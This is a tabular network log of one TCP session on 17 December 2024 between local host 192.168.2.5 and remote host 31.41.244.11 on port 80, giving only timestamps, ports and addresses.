Dec 17, 2024 06:03:41.992888927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.993865013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.993908882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.993922949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.993964911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.994874954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.994919062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.995366096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.995408058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.996105909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.996128082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.996150017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.996162891 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.997133017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.997150898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.997179031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.997195005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.998086929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.998136044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.998177052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.998220921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.999270916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.999290943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.999322891 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.999336958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.000328064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.000346899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.000375032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.000386000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.001282930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.001332045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.001343966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.001384974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.002291918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.002357006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.002428055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.002473116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.003366947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.003413916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.003595114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.003638029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.004460096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.004507065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.004533052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.004575014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.005901098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.005914927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.005955935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.006660938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.006675959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.006722927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.007556915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.007606983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.145240068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.145395041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.146171093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.146238089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147259951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147320986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147428036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147449017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147468090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147469997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147486925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147490978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147505999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147528887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147604942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.147643089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.147784948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.148066998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.148655891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.148678064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.148703098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.148727894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.149059057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.149102926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.149250984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.149292946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.150429964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.150444984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.150496960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.150510073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.151362896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.151412010 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.151746035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.151789904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155158997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155178070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155200958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155215025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155226946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155249119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155319929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155338049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155358076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155360937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.155375957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.155397892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.156024933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.156065941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.156172037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.156213999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.157186031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.157236099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.157361984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.157402992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.158220053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.158282042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.158409119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.158451080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.159298897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.159327030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.159360886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.159373045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.160279036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.160320044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.160419941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.160464048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.161079884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.161101103 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.161120892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.161133051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.162017107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.162035942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.162055016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.162089109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.162885904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.162929058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.163065910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.163109064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.163942099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.163985968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.164158106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.164201021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.165004969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.165051937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.165132046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.165174961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.166094065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.166136980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.166354895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.166392088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.167165995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.167222023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.167361975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.167401075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.168250084 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.168313026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.168318987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.168356895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.169336081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.169356108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.169389009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.169404030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.170291901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.170341969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.170367956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.170406103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.171411991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.171468973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.171483994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.171523094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.172410965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.172457933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.172570944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.172610044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.173492908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.173542023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.173548937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.173588037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.174565077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.174602985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.174643040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.174679995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.175662041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.175699949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.175791025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.175832987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.176723957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.176764011 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.176785946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.176822901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.177853107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.177871943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.177891016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.177913904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.178818941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.178880930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.178989887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.179025888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.179976940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.179996967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.180016041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.180032015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.180896997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.180939913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.181087971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.181127071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.182056904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.182077885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.182097912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.182118893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.183063984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.183101892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.183206081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.183244944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.184071064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.184113026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.184195995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.184232950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.185348988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.185369015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.185388088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.185396910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.186209917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.186249018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.186295033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.186338902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.187364101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.187407970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.187442064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.187480927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.188328028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.188368082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.188405991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.188441992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.189408064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.189466000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.189505100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.189542055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.190481901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.190531015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.190629959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.190664053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.191561937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.191601038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.191675901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.191715002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.192771912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.192812920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.193072081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.193108082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.193748951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.193768978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.193790913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.193814039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.194745064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.194785118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.194906950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.194948912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.195756912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.195796013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.195867062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.195904970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.196759939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.196796894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.196881056 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.196919918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.197947979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.197978020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.197992086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.198014021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.198950052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.198988914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.199156046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.199193001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.336718082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.336746931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.336782932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.336817980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.337163925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.337203979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.337203979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.337239981 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.338094950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.338140965 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.338215113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.338254929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.339207888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.339246035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.339277983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.339322090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.340223074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.340260983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.340348005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.340385914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.341309071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.341346979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.341394901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.341434956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.342462063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.342509985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.342595100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.342632055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.343386889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.343430042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.343463898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.343502045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.344463110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.344500065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.344504118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.344537973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.345516920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.345556974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.345814943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.345858097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.346596003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.346633911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.346657038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.346698999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.347697020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.347708941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.347738028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.347755909 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.348820925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.348838091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.348866940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.348886967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.349770069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.349809885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.349854946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.349903107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.350866079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.350908041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.350940943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.350985050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.351982117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.351994038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.352027893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.352051020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.352931023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.352956057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.352969885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.352992058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.354026079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.354120970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.354183912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.354228973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.355015993 CET	80	49902	31.41.244.11	192.168.2.5
